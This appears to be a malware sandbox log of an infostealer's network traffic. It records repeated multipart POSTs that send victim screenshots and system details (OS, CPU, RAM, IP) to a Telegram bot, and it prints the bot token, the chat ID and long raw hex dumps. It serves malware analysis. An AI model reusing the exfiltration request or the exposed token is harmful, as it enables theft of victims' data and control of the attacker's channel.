                                                                  {"ok":true,"result":{"message_id":3449,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548192,"document":{"file_name":"user-618321 2024-05-26 16-17-14.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg15ZiKroDIbP-HD72oGl0QnSFXOxLcAAr0XAAKLUhlRPqa5jMe5tbYBAAdtAAM0BA","file_unique_id":"AQADvRcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg15ZiKroDIbP-HD72oGl0QnSFXOxLcAAr0XAAKLUhlRPqa5jMe5tbYBAAdtAAM0BA","file_unique_id":"AQADvRcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINeWYiq6AyGz_hw-9qBpdEJ0hVzsS3AAK9FwACi1IZUT6muYzHubW2NAQ","file_unique_id":"AgADvRcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/26/2024 16:12:13\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                  18          192.168.2.5  49732        149.154.167.220  443               3472  C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-04-19 17:36:35 UTC  262                OUT        POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8b4b8f6210f4
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:36 UTC  1024               OUT        Data Ascii: -----------------------------8dc8b4b8f6210f4Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8b4b8f6210f4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/13/2024 01:48:00User
                                                                  2024-04-19 17:36:36 UTC  (5 chunks)         OUT        [JPEG file body omitted: five raw chunks of 16355, 16355, 16355, 15447 and 1552 bytes]
                                                                  2024-04-19 17:36:36 UTC  50                 OUT        Data Ascii: -----------------------------8dc8b4b8f6210f4--
                                                                  2024-04-19 17:36:36 UTC  25                 IN         HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:36 UTC  1485               IN         HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:36 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3450,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548196,"document":{"file_name":"user-618321 2024-06-13 01-53-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg16ZiKrpJHaBMUMdNwQAAG13r1nfm0-AAK-FwACi1IZUf7-Xeund9HXAQAHbQADNAQ","file_unique_id":"AQADvhcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg16ZiKrpJHaBMUMdNwQAAG13r1nfm0-AAK-FwACi1IZUf7-Xeund9HXAQAHbQADNAQ","file_unique_id":"AQADvhcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINemYiq6SR2gTFDHTcEAABtd69Z35tPgACvhcAAotSGVH-_l3rp3fR1zQE","file_unique_id":"AgADvhcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/13/2024 01:48:00\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                  19          192.168.2.5  49733        149.154.167.220  443               7324  C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-04-19 17:36:36 UTC  238                OUT        POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8048c2fa9c0c
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:37 UTC  1024               OUT        Data Ascii: -----------------------------8dc8048c2fa9c0cContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8048c2fa9c0cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/30/2024 01:30:16User
                                                                  2024-04-19 17:36:37 UTC  (5 chunks)         OUT        [JPEG file body omitted: five raw chunks of 16355, 16355, 16355, 15447 and 1552 bytes]
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:37 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 34 38 63 32 66 61 39 63 30 63 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8048c2fa9c0c--
                                                                  2024-04-19 17:36:37 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:37 UTC | 1485 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:37 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3451,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548197,"document":{"file_name":"user-618321 2024-05-30 01-35-17.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg17ZiKrpQoAAUIdCpMK59DhQpR1Q16SAAK_FwACi1IZUUQDO0wHQoYyAQAHbQADNAQ","file_unique_id":"AQADvxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg17ZiKrpQoAAUIdCpMK59DhQpR1Q16SAAK_FwACi1IZUUQDO0wHQoYyAQAHbQADNAQ","file_unique_id":"AQADvxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINe2Yiq6UKAAFCHQqTCufQ4UKUdUNekgACvxcAAotSGVFEAztMB0KGMjQE","file_unique_id":"AgADvxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/30/2024 01:30:16\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.5 | 49735 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:36:38 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8f1ec5eab97f
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:38 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 37 2f 32 30 32 34 20 32 32 3a 33 37 3a 32 34 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc8f1ec5eab97fContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8f1ec5eab97fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/17/2024 22:37:24User
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:38 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:38 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:38 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8f1ec5eab97f--
                                                                  2024-04-19 17:36:38 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:39 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:39 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3452,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548199,"document":{"file_name":"user-618321 2024-06-17 22-42-31.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg18ZiKrp4xgJXteIbwjjJ_K76X1dqkAAsAXAAKLUhlR3hoLe0TZtGwBAAdtAAM0BA","file_unique_id":"AQADwBcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg18ZiKrp4xgJXteIbwjjJ_K76X1dqkAAsAXAAKLUhlR3hoLe0TZtGwBAAdtAAM0BA","file_unique_id":"AQADwBcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfGYiq6eMYCV7XiG8I4yfyu-l9XapAALAFwACi1IZUd4aC3tE2bRsNAQ","file_unique_id":"AgADwBcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/17/2024 22:37:24\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.5 | 49736 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:36:41 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc91ad9f6f5749
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:42 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 31 2f 32 30 32 34 20 30 34 3a 34 30 3a 30 37 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc91ad9f6f5749Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc91ad9f6f5749Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/21/2024 04:40:07User
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:42 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:42 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
